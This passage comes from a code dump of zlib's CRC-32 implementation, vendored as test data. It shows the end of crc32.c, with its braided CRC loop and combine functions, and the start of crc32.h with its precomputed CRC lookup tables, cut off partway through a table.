*/ crc0 = crc_braid_big_table[0][word0 & 0xff]; #if N > 1 crc1 = crc_braid_big_table[0][word1 & 0xff]; #if N > 2 crc2 = crc_braid_big_table[0][word2 & 0xff]; #if N > 3 crc3 = crc_braid_big_table[0][word3 & 0xff]; #if N > 4 crc4 = crc_braid_big_table[0][word4 & 0xff]; #if N > 5 crc5 = crc_braid_big_table[0][word5 & 0xff]; #endif #endif #endif #endif #endif for (k = 1; k < W; k++) { crc0 ^= crc_braid_big_table[k][(word0 >> (k << 3)) & 0xff]; #if N > 1 crc1 ^= crc_braid_big_table[k][(word1 >> (k << 3)) & 0xff]; #if N > 2 crc2 ^= crc_braid_big_table[k][(word2 >> (k << 3)) & 0xff]; #if N > 3 crc3 ^= crc_braid_big_table[k][(word3 >> (k << 3)) & 0xff]; #if N > 4 crc4 ^= crc_braid_big_table[k][(word4 >> (k << 3)) & 0xff]; #if N > 5 crc5 ^= crc_braid_big_table[k][(word5 >> (k << 3)) & 0xff]; #endif #endif #endif #endif #endif } } /* Process the last block, combining the CRCs of the N braids at the same time. */ comb = crc_word_big(crc0 ^ words[0]); #if N > 1 comb = crc_word_big(crc1 ^ words[1] ^ comb); #if N > 2 comb = crc_word_big(crc2 ^ words[2] ^ comb); #if N > 3 comb = crc_word_big(crc3 ^ words[3] ^ comb); #if N > 4 comb = crc_word_big(crc4 ^ words[4] ^ comb); #if N > 5 comb = crc_word_big(crc5 ^ words[5] ^ comb); #endif #endif #endif #endif #endif words += N; crc = byte_swap(comb); } /* Update the pointer to the remaining bytes to process. */ buf = (unsigned char const *)words; } #endif /* W */ /* Complete the computation of the CRC on any remaining bytes. 
*/ while (len >= 8) { len -= 8; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; } while (len) { len--; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; } /* Return the CRC, post-conditioned. */ return crc ^ 0xffffffff; } #endif /* ========================================================================= */ unsigned long ZEXPORT crc32(unsigned long crc, const unsigned char FAR *buf, uInt len) { return crc32_z(crc, buf, len); } /* ========================================================================= */ uLong ZEXPORT crc32_combine64(uLong crc1, uLong crc2, z_off64_t len2) { #ifdef DYNAMIC_CRC_TABLE once(&made, make_crc_table); #endif /* DYNAMIC_CRC_TABLE */ return multmodp(x2nmodp(len2, 3), crc1) ^ (crc2 & 0xffffffff); } /* ========================================================================= */ uLong ZEXPORT crc32_combine(uLong crc1, uLong crc2, z_off_t len2) { return crc32_combine64(crc1, crc2, (z_off64_t)len2); } /* ========================================================================= */ uLong ZEXPORT crc32_combine_gen64(z_off64_t len2) { #ifdef DYNAMIC_CRC_TABLE once(&made, make_crc_table); #endif /* DYNAMIC_CRC_TABLE */ return x2nmodp(len2, 3); } /* ========================================================================= */ uLong ZEXPORT crc32_combine_gen(z_off_t len2) { return crc32_combine_gen64((z_off64_t)len2); } /* ========================================================================= */ uLong ZEXPORT crc32_combine_op(uLong crc1, uLong crc2, uLong op) { return multmodp(op, crc1) ^ (crc2 & 0xffffffff); } ================================================ FILE: 
internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/crc32.h ================================================ /* crc32.h -- tables for rapid CRC calculation * Generated automatically by crc32.c */ local const z_crc_t FAR crc_table[] = { 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 
0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d}; #ifdef W #if W == 8 local const z_word_t FAR crc_big_table[] = { 0x0000000000000000, 0x9630077700000000, 0x2c610eee00000000, 0xba51099900000000, 0x19c46d0700000000, 0x8ff46a7000000000, 0x35a563e900000000, 0xa395649e00000000, 0x3288db0e00000000, 0xa4b8dc7900000000, 0x1ee9d5e000000000, 0x88d9d29700000000, 0x2b4cb60900000000, 0xbd7cb17e00000000, 0x072db8e700000000, 0x911dbf9000000000, 0x6410b71d00000000, 0xf220b06a00000000, 0x4871b9f300000000, 0xde41be8400000000, 0x7dd4da1a00000000, 0xebe4dd6d00000000, 0x51b5d4f400000000, 0xc785d38300000000, 0x56986c1300000000, 0xc0a86b6400000000, 0x7af962fd00000000, 0xecc9658a00000000, 0x4f5c011400000000, 0xd96c066300000000, 
0x633d0ffa00000000, 0xf50d088d00000000, 0xc8206e3b00000000, 0x5e10694c00000000, 0xe44160d500000000, 0x727167a200000000, 0xd1e4033c00000000, 0x47d4044b00000000, 0xfd850dd200000000, 0x6bb50aa500000000, 0xfaa8b53500000000, 0x6c98b24200000000, 0xd6c9bbdb00000000, 0x40f9bcac00000000, 0xe36cd83200000000, 0x755cdf4500000000, 0xcf0dd6dc00000000, 0x593dd1ab00000000, 0xac30d92600000000, 0x3a00de5100000000, 0x8051d7c800000000, 0x1661d0bf00000000, 0xb5f4b42100000000, 0x23c4b35600000000, 0x9995bacf00000000, 0x0fa5bdb800000000, 0x9eb8022800000000, 0x0888055f00000000, 0xb2d90cc600000000, 0x24e90bb100000000, 0x877c6f2f00000000, 0x114c685800000000, 0xab1d61c100000000, 0x3d2d66b600000000, 0x9041dc7600000000, 0x0671db0100000000, 0xbc20d29800000000, 0x2a10d5ef00000000, 0x8985b17100000000, 0x1fb5b60600000000, 0xa5e4bf9f00000000, 0x33d4b8e800000000, 0xa2c9077800000000, 0x34f9000f00000000, 0x8ea8099600000000, 0x18980ee100000000, 0xbb0d6a7f00000000, 0x2d3d6d0800000000, 0x976c649100000000, 0x015c63e600000000, 0xf4516b6b00000000, 0x62616c1c00000000, 0xd830658500000000, 0x4e0062f200000000, 0xed95066c00000000, 0x7ba5011b00000000, 0xc1f4088200000000, 0x57c40ff500000000, 0xc6d9b06500000000, 0x50e9b71200000000, 0xeab8be8b00000000, 0x7c88b9fc00000000, 0xdf1ddd6200000000, 0x492dda1500000000, 0xf37cd38c00000000, 0x654cd4fb00000000, 0x5861b24d00000000, 0xce51b53a00000000, 0x7400bca300000000, 0xe230bbd400000000, 0x41a5df4a00000000, 0xd795d83d00000000, 0x6dc4d1a400000000, 0xfbf4d6d300000000, 0x6ae9694300000000, 0xfcd96e3400000000, 0x468867ad00000000, 0xd0b860da00000000, 0x732d044400000000, 0xe51d033300000000, 0x5f4c0aaa00000000, 0xc97c0ddd00000000, 0x3c71055000000000, 0xaa41022700000000, 0x10100bbe00000000, 0x86200cc900000000, 0x25b5685700000000, 0xb3856f2000000000, 0x09d466b900000000, 0x9fe461ce00000000, 0x0ef9de5e00000000, 0x98c9d92900000000, 0x2298d0b000000000, 0xb4a8d7c700000000, 0x173db35900000000, 0x810db42e00000000, 0x3b5cbdb700000000, 0xad6cbac000000000, 0x2083b8ed00000000, 0xb6b3bf9a00000000, 
0x0ce2b60300000000, 0x9ad2b17400000000, 0x3947d5ea00000000, 0xaf77d29d00000000, 0x1526db0400000000, 0x8316dc7300000000, 0x120b63e300000000, 0x843b649400000000, 0x3e6a6d0d00000000, 0xa85a6a7a00000000, 0x0bcf0ee400000000, 0x9dff099300000000, 0x27ae000a00000000, 0xb19e077d00000000, 0x44930ff000000000, 0xd2a3088700000000, 0x68f2011e00000000, 0xfec2066900000000, 0x5d5762f700000000, 0xcb67658000000000, 0x71366c1900000000, 0xe7066b6e00000000, 0x761bd4fe00000000, 0xe02bd38900000000, 0x5a7ada1000000000, 0xcc4add6700000000, 0x6fdfb9f900000000, 0xf9efbe8e00000000, 0x43beb71700000000, 0xd58eb06000000000, 0xe8a3d6d600000000, 0x7e93d1a100000000, 0xc4c2d83800000000, 0x52f2df4f00000000, 0xf167bbd100000000, 0x6757bca600000000, 0xdd06b53f00000000, 0x4b36b24800000000, 0xda2b0dd800000000, 0x4c1b0aaf00000000, 0xf64a033600000000, 0x607a044100000000, 0xc3ef60df00000000, 0x55df67a800000000, 0xef8e6e3100000000, 0x79be694600000000, 0x8cb361cb00000000, 0x1a8366bc00000000, 0xa0d26f2500000000, 0x36e2685200000000, 0x95770ccc00000000, 0x03470bbb00000000, 0xb916022200000000, 0x2f26055500000000, 0xbe3bbac500000000, 0x280bbdb200000000, 0x925ab42b00000000, 0x046ab35c00000000, 0xa7ffd7c200000000, 0x31cfd0b500000000, 0x8b9ed92c00000000, 0x1daede5b00000000, 0xb0c2649b00000000, 0x26f263ec00000000, 0x9ca36a7500000000, 0x0a936d0200000000, 0xa906099c00000000, 0x3f360eeb00000000, 0x8567077200000000, 0x1357000500000000, 0x824abf9500000000, 0x147ab8e200000000, 0xae2bb17b00000000, 0x381bb60c00000000, 0x9b8ed29200000000, 0x0dbed5e500000000, 0xb7efdc7c00000000, 0x21dfdb0b00000000, 0xd4d2d38600000000, 0x42e2d4f100000000, 0xf8b3dd6800000000, 0x6e83da1f00000000, 0xcd16be8100000000, 0x5b26b9f600000000, 0xe177b06f00000000, 0x7747b71800000000, 0xe65a088800000000, 0x706a0fff00000000, 0xca3b066600000000, 0x5c0b011100000000, 0xff9e658f00000000, 0x69ae62f800000000, 0xd3ff6b6100000000, 0x45cf6c1600000000, 0x78e20aa000000000, 0xeed20dd700000000, 0x5483044e00000000, 0xc2b3033900000000, 0x612667a700000000, 0xf71660d000000000, 
0x4d47694900000000, 0xdb776e3e00000000, 0x4a6ad1ae00000000, 0xdc5ad6d900000000, 0x660bdf4000000000, 0xf03bd83700000000, 0x53aebca900000000, 0xc59ebbde00000000, 0x7fcfb24700000000, 0xe9ffb53000000000, 0x1cf2bdbd00000000, 0x8ac2baca00000000, 0x3093b35300000000, 0xa6a3b42400000000, 0x0536d0ba00000000, 0x9306d7cd00000000, 0x2957de5400000000, 0xbf67d92300000000, 0x2e7a66b300000000, 0xb84a61c400000000, 0x021b685d00000000, 0x942b6f2a00000000, 0x37be0bb400000000, 0xa18e0cc300000000, 0x1bdf055a00000000, 0x8def022d00000000}; #else /* W == 4 */ local const z_word_t FAR crc_big_table[] = { 0x00000000, 0x96300777, 0x2c610eee, 0xba510999, 0x19c46d07, 0x8ff46a70, 0x35a563e9, 0xa395649e, 0x3288db0e, 0xa4b8dc79, 0x1ee9d5e0, 0x88d9d297, 0x2b4cb609, 0xbd7cb17e, 0x072db8e7, 0x911dbf90, 0x6410b71d, 0xf220b06a, 0x4871b9f3, 0xde41be84, 0x7dd4da1a, 0xebe4dd6d, 0x51b5d4f4, 0xc785d383, 0x56986c13, 0xc0a86b64, 0x7af962fd, 0xecc9658a, 0x4f5c0114, 0xd96c0663, 0x633d0ffa, 0xf50d088d, 0xc8206e3b, 0x5e10694c, 0xe44160d5, 0x727167a2, 0xd1e4033c, 0x47d4044b, 0xfd850dd2, 0x6bb50aa5, 0xfaa8b535, 0x6c98b242, 0xd6c9bbdb, 0x40f9bcac, 0xe36cd832, 0x755cdf45, 0xcf0dd6dc, 0x593dd1ab, 0xac30d926, 0x3a00de51, 0x8051d7c8, 0x1661d0bf, 0xb5f4b421, 0x23c4b356, 0x9995bacf, 0x0fa5bdb8, 0x9eb80228, 0x0888055f, 0xb2d90cc6, 0x24e90bb1, 0x877c6f2f, 0x114c6858, 0xab1d61c1, 0x3d2d66b6, 0x9041dc76, 0x0671db01, 0xbc20d298, 0x2a10d5ef, 0x8985b171, 0x1fb5b606, 0xa5e4bf9f, 0x33d4b8e8, 0xa2c90778, 0x34f9000f, 0x8ea80996, 0x18980ee1, 0xbb0d6a7f, 0x2d3d6d08, 0x976c6491, 0x015c63e6, 0xf4516b6b, 0x62616c1c, 0xd8306585, 0x4e0062f2, 0xed95066c, 0x7ba5011b, 0xc1f40882, 0x57c40ff5, 0xc6d9b065, 0x50e9b712, 0xeab8be8b, 0x7c88b9fc, 0xdf1ddd62, 0x492dda15, 0xf37cd38c, 0x654cd4fb, 0x5861b24d, 0xce51b53a, 0x7400bca3, 0xe230bbd4, 0x41a5df4a, 0xd795d83d, 0x6dc4d1a4, 0xfbf4d6d3, 0x6ae96943, 0xfcd96e34, 0x468867ad, 0xd0b860da, 0x732d0444, 0xe51d0333, 0x5f4c0aaa, 0xc97c0ddd, 0x3c710550, 0xaa410227, 0x10100bbe, 0x86200cc9, 0x25b56857, 
0xb3856f20, 0x09d466b9, 0x9fe461ce, 0x0ef9de5e, 0x98c9d929, 0x2298d0b0, 0xb4a8d7c7, 0x173db359, 0x810db42e, 0x3b5cbdb7, 0xad6cbac0, 0x2083b8ed, 0xb6b3bf9a, 0x0ce2b603, 0x9ad2b174, 0x3947d5ea, 0xaf77d29d, 0x1526db04, 0x8316dc73, 0x120b63e3, 0x843b6494, 0x3e6a6d0d, 0xa85a6a7a, 0x0bcf0ee4, 0x9dff0993, 0x27ae000a, 0xb19e077d, 0x44930ff0, 0xd2a30887, 0x68f2011e, 0xfec20669, 0x5d5762f7, 0xcb676580, 0x71366c19, 0xe7066b6e, 0x761bd4fe, 0xe02bd389, 0x5a7ada10, 0xcc4add67, 0x6fdfb9f9, 0xf9efbe8e, 0x43beb717, 0xd58eb060, 0xe8a3d6d6, 0x7e93d1a1, 0xc4c2d838, 0x52f2df4f, 0xf167bbd1, 0x6757bca6, 0xdd06b53f, 0x4b36b248, 0xda2b0dd8, 0x4c1b0aaf, 0xf64a0336, 0x607a0441, 0xc3ef60df, 0x55df67a8, 0xef8e6e31, 0x79be6946, 0x8cb361cb, 0x1a8366bc, 0xa0d26f25, 0x36e26852, 0x95770ccc, 0x03470bbb, 0xb9160222, 0x2f260555, 0xbe3bbac5, 0x280bbdb2, 0x925ab42b, 0x046ab35c, 0xa7ffd7c2, 0x31cfd0b5, 0x8b9ed92c, 0x1daede5b, 0xb0c2649b, 0x26f263ec, 0x9ca36a75, 0x0a936d02, 0xa906099c, 0x3f360eeb, 0x85670772, 0x13570005, 0x824abf95, 0x147ab8e2, 0xae2bb17b, 0x381bb60c, 0x9b8ed292, 0x0dbed5e5, 0xb7efdc7c, 0x21dfdb0b, 0xd4d2d386, 0x42e2d4f1, 0xf8b3dd68, 0x6e83da1f, 0xcd16be81, 0x5b26b9f6, 0xe177b06f, 0x7747b718, 0xe65a0888, 0x706a0fff, 0xca3b0666, 0x5c0b0111, 0xff9e658f, 0x69ae62f8, 0xd3ff6b61, 0x45cf6c16, 0x78e20aa0, 0xeed20dd7, 0x5483044e, 0xc2b30339, 0x612667a7, 0xf71660d0, 0x4d476949, 0xdb776e3e, 0x4a6ad1ae, 0xdc5ad6d9, 0x660bdf40, 0xf03bd837, 0x53aebca9, 0xc59ebbde, 0x7fcfb247, 0xe9ffb530, 0x1cf2bdbd, 0x8ac2baca, 0x3093b353, 0xa6a3b424, 0x0536d0ba, 0x9306d7cd, 0x2957de54, 0xbf67d923, 0x2e7a66b3, 0xb84a61c4, 0x021b685d, 0x942b6f2a, 0x37be0bb4, 0xa18e0cc3, 0x1bdf055a, 0x8def022d}; #endif #if N == 1 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xccaa009e, 0x4225077d, 0x8e8f07e3, 0x844a0efa, 0x48e00e64, 0xc66f0987, 0x0ac50919, 0xd3e51bb5, 0x1f4f1b2b, 0x91c01cc8, 0x5d6a1c56, 0x57af154f, 0x9b0515d1, 0x158a1232, 0xd92012ac, 0x7cbb312b, 0xb01131b5, 0x3e9e3656, 0xf23436c8, 
0xf8f13fd1, 0x345b3f4f, 0xbad438ac, 0x767e3832, 0xaf5e2a9e, 0x63f42a00, 0xed7b2de3, 0x21d12d7d, 0x2b142464, 0xe7be24fa, 0x69312319, 0xa59b2387, 0xf9766256, 0x35dc62c8, 0xbb53652b, 0x77f965b5, 0x7d3c6cac, 0xb1966c32, 0x3f196bd1, 0xf3b36b4f, 0x2a9379e3, 0xe639797d, 0x68b67e9e, 0xa41c7e00, 0xaed97719, 0x62737787, 0xecfc7064, 0x205670fa, 0x85cd537d, 0x496753e3, 0xc7e85400, 0x0b42549e, 0x01875d87, 0xcd2d5d19, 0x43a25afa, 0x8f085a64, 0x562848c8, 0x9a824856, 0x140d4fb5, 0xd8a74f2b, 0xd2624632, 0x1ec846ac, 0x9047414f, 0x5ced41d1, 0x299dc2ed, 0xe537c273, 0x6bb8c590, 0xa712c50e, 0xadd7cc17, 0x617dcc89, 0xeff2cb6a, 0x2358cbf4, 0xfa78d958, 0x36d2d9c6, 0xb85dde25, 0x74f7debb, 0x7e32d7a2, 0xb298d73c, 0x3c17d0df, 0xf0bdd041, 0x5526f3c6, 0x998cf358, 0x1703f4bb, 0xdba9f425, 0xd16cfd3c, 0x1dc6fda2, 0x9349fa41, 0x5fe3fadf, 0x86c3e873, 0x4a69e8ed, 0xc4e6ef0e, 0x084cef90, 0x0289e689, 0xce23e617, 0x40ace1f4, 0x8c06e16a, 0xd0eba0bb, 0x1c41a025, 0x92cea7c6, 0x5e64a758, 0x54a1ae41, 0x980baedf, 0x1684a93c, 0xda2ea9a2, 0x030ebb0e, 0xcfa4bb90, 0x412bbc73, 0x8d81bced, 0x8744b5f4, 0x4beeb56a, 0xc561b289, 0x09cbb217, 0xac509190, 0x60fa910e, 0xee7596ed, 0x22df9673, 0x281a9f6a, 0xe4b09ff4, 0x6a3f9817, 0xa6959889, 0x7fb58a25, 0xb31f8abb, 0x3d908d58, 0xf13a8dc6, 0xfbff84df, 0x37558441, 0xb9da83a2, 0x7570833c, 0x533b85da, 0x9f918544, 0x111e82a7, 0xddb48239, 0xd7718b20, 0x1bdb8bbe, 0x95548c5d, 0x59fe8cc3, 0x80de9e6f, 0x4c749ef1, 0xc2fb9912, 0x0e51998c, 0x04949095, 0xc83e900b, 0x46b197e8, 0x8a1b9776, 0x2f80b4f1, 0xe32ab46f, 0x6da5b38c, 0xa10fb312, 0xabcaba0b, 0x6760ba95, 0xe9efbd76, 0x2545bde8, 0xfc65af44, 0x30cfafda, 0xbe40a839, 0x72eaa8a7, 0x782fa1be, 0xb485a120, 0x3a0aa6c3, 0xf6a0a65d, 0xaa4de78c, 0x66e7e712, 0xe868e0f1, 0x24c2e06f, 0x2e07e976, 0xe2ade9e8, 0x6c22ee0b, 0xa088ee95, 0x79a8fc39, 0xb502fca7, 0x3b8dfb44, 0xf727fbda, 0xfde2f2c3, 0x3148f25d, 0xbfc7f5be, 0x736df520, 0xd6f6d6a7, 0x1a5cd639, 0x94d3d1da, 0x5879d144, 0x52bcd85d, 0x9e16d8c3, 0x1099df20, 0xdc33dfbe, 0x0513cd12, 0xc9b9cd8c, 
0x4736ca6f, 0x8b9ccaf1, 0x8159c3e8, 0x4df3c376, 0xc37cc495, 0x0fd6c40b, 0x7aa64737, 0xb60c47a9, 0x3883404a, 0xf42940d4, 0xfeec49cd, 0x32464953, 0xbcc94eb0, 0x70634e2e, 0xa9435c82, 0x65e95c1c, 0xeb665bff, 0x27cc5b61, 0x2d095278, 0xe1a352e6, 0x6f2c5505, 0xa386559b, 0x061d761c, 0xcab77682, 0x44387161, 0x889271ff, 0x825778e6, 0x4efd7878, 0xc0727f9b, 0x0cd87f05, 0xd5f86da9, 0x19526d37, 0x97dd6ad4, 0x5b776a4a, 0x51b26353, 0x9d1863cd, 0x1397642e, 0xdf3d64b0, 0x83d02561, 0x4f7a25ff, 0xc1f5221c, 0x0d5f2282, 0x079a2b9b, 0xcb302b05, 0x45bf2ce6, 0x89152c78, 0x50353ed4, 0x9c9f3e4a, 0x121039a9, 0xdeba3937, 0xd47f302e, 0x18d530b0, 0x965a3753, 0x5af037cd, 0xff6b144a, 0x33c114d4, 0xbd4e1337, 0x71e413a9, 0x7b211ab0, 0xb78b1a2e, 0x39041dcd, 0xf5ae1d53, 0x2c8e0fff, 0xe0240f61, 0x6eab0882, 0xa201081c, 0xa8c40105, 0x646e019b, 0xeae10678, 0x264b06e6}, {0x00000000, 0xa6770bb4, 0x979f1129, 0x31e81a9d, 0xf44f2413, 0x52382fa7, 0x63d0353a, 0xc5a73e8e, 0x33ef4e67, 0x959845d3, 0xa4705f4e, 0x020754fa, 0xc7a06a74, 0x61d761c0, 0x503f7b5d, 0xf64870e9, 0x67de9cce, 0xc1a9977a, 0xf0418de7, 0x56368653, 0x9391b8dd, 0x35e6b369, 0x040ea9f4, 0xa279a240, 0x5431d2a9, 0xf246d91d, 0xc3aec380, 0x65d9c834, 0xa07ef6ba, 0x0609fd0e, 0x37e1e793, 0x9196ec27, 0xcfbd399c, 0x69ca3228, 0x582228b5, 0xfe552301, 0x3bf21d8f, 0x9d85163b, 0xac6d0ca6, 0x0a1a0712, 0xfc5277fb, 0x5a257c4f, 0x6bcd66d2, 0xcdba6d66, 0x081d53e8, 0xae6a585c, 0x9f8242c1, 0x39f54975, 0xa863a552, 0x0e14aee6, 0x3ffcb47b, 0x998bbfcf, 0x5c2c8141, 0xfa5b8af5, 0xcbb39068, 0x6dc49bdc, 0x9b8ceb35, 0x3dfbe081, 0x0c13fa1c, 0xaa64f1a8, 0x6fc3cf26, 0xc9b4c492, 0xf85cde0f, 0x5e2bd5bb, 0x440b7579, 0xe27c7ecd, 0xd3946450, 0x75e36fe4, 0xb044516a, 0x16335ade, 0x27db4043, 0x81ac4bf7, 0x77e43b1e, 0xd19330aa, 0xe07b2a37, 0x460c2183, 0x83ab1f0d, 0x25dc14b9, 0x14340e24, 0xb2430590, 0x23d5e9b7, 0x85a2e203, 0xb44af89e, 0x123df32a, 0xd79acda4, 0x71edc610, 0x4005dc8d, 0xe672d739, 0x103aa7d0, 0xb64dac64, 0x87a5b6f9, 0x21d2bd4d, 0xe47583c3, 0x42028877, 0x73ea92ea, 0xd59d995e, 
0x8bb64ce5, 0x2dc14751, 0x1c295dcc, 0xba5e5678, 0x7ff968f6, 0xd98e6342, 0xe86679df, 0x4e11726b, 0xb8590282, 0x1e2e0936, 0x2fc613ab, 0x89b1181f, 0x4c162691, 0xea612d25, 0xdb8937b8, 0x7dfe3c0c, 0xec68d02b, 0x4a1fdb9f, 0x7bf7c102, 0xdd80cab6, 0x1827f438, 0xbe50ff8c, 0x8fb8e511, 0x29cfeea5, 0xdf879e4c, 0x79f095f8, 0x48188f65, 0xee6f84d1, 0x2bc8ba5f, 0x8dbfb1eb, 0xbc57ab76, 0x1a20a0c2, 0x8816eaf2, 0x2e61e146, 0x1f89fbdb, 0xb9fef06f, 0x7c59cee1, 0xda2ec555, 0xebc6dfc8, 0x4db1d47c, 0xbbf9a495, 0x1d8eaf21, 0x2c66b5bc, 0x8a11be08, 0x4fb68086, 0xe9c18b32, 0xd82991af, 0x7e5e9a1b, 0xefc8763c, 0x49bf7d88, 0x78576715, 0xde206ca1, 0x1b87522f, 0xbdf0599b, 0x8c184306, 0x2a6f48b2, 0xdc27385b, 0x7a5033ef, 0x4bb82972, 0xedcf22c6, 0x28681c48, 0x8e1f17fc, 0xbff70d61, 0x198006d5, 0x47abd36e, 0xe1dcd8da, 0xd034c247, 0x7643c9f3, 0xb3e4f77d, 0x1593fcc9, 0x247be654, 0x820cede0, 0x74449d09, 0xd23396bd, 0xe3db8c20, 0x45ac8794, 0x800bb91a, 0x267cb2ae, 0x1794a833, 0xb1e3a387, 0x20754fa0, 0x86024414, 0xb7ea5e89, 0x119d553d, 0xd43a6bb3, 0x724d6007, 0x43a57a9a, 0xe5d2712e, 0x139a01c7, 0xb5ed0a73, 0x840510ee, 0x22721b5a, 0xe7d525d4, 0x41a22e60, 0x704a34fd, 0xd63d3f49, 0xcc1d9f8b, 0x6a6a943f, 0x5b828ea2, 0xfdf58516, 0x3852bb98, 0x9e25b02c, 0xafcdaab1, 0x09baa105, 0xfff2d1ec, 0x5985da58, 0x686dc0c5, 0xce1acb71, 0x0bbdf5ff, 0xadcafe4b, 0x9c22e4d6, 0x3a55ef62, 0xabc30345, 0x0db408f1, 0x3c5c126c, 0x9a2b19d8, 0x5f8c2756, 0xf9fb2ce2, 0xc813367f, 0x6e643dcb, 0x982c4d22, 0x3e5b4696, 0x0fb35c0b, 0xa9c457bf, 0x6c636931, 0xca146285, 0xfbfc7818, 0x5d8b73ac, 0x03a0a617, 0xa5d7ada3, 0x943fb73e, 0x3248bc8a, 0xf7ef8204, 0x519889b0, 0x6070932d, 0xc6079899, 0x304fe870, 0x9638e3c4, 0xa7d0f959, 0x01a7f2ed, 0xc400cc63, 0x6277c7d7, 0x539fdd4a, 0xf5e8d6fe, 0x647e3ad9, 0xc209316d, 0xf3e12bf0, 0x55962044, 0x90311eca, 0x3646157e, 0x07ae0fe3, 0xa1d90457, 0x579174be, 0xf1e67f0a, 0xc00e6597, 0x66796e23, 0xa3de50ad, 0x05a95b19, 0x34414184, 0x92364a30}, {0x00000000, 0xcb5cd3a5, 0x4dc8a10b, 0x869472ae, 0x9b914216, 0x50cd91b3, 
